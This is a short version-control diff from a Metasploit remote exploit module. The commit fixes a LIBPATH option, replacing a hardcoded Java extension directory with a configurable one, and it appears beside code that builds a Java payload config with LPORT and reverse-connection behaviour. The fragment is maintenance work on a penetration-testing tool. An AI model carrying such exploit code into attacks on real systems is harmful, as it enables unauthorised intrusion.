oops, broke the LIBPATH option
git-svn-id: file:///home/svn/framework3/trunk@12015 4d416f70-5f16-0410-b530-b9f4589650da
This commit is contained in:
@@ -114,8 +114,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||
host_num = Rex::Socket.addr_aton(host).unpack('N').first
|
||||
code_url = jpath.sub(host, host_num.to_s)
|
||||
|
||||
codebase = "file:" + "C:\\Program Files (x86)\\java\\jre6\\lib\\ext"
|
||||
codebase = "file:" + "C:\\Program Files\\java\\jre6\\lib\\ext"
|
||||
codebase = "file:" + datastore['LIBPATH']
|
||||
|
||||
config = "Spawn=2\nLPORT=#{datastore['LPORT']}\n"
|
||||
# The java payloads decide to be reverse if LHOST is set.
|
||||
|
||||
Reference in New Issue
Block a user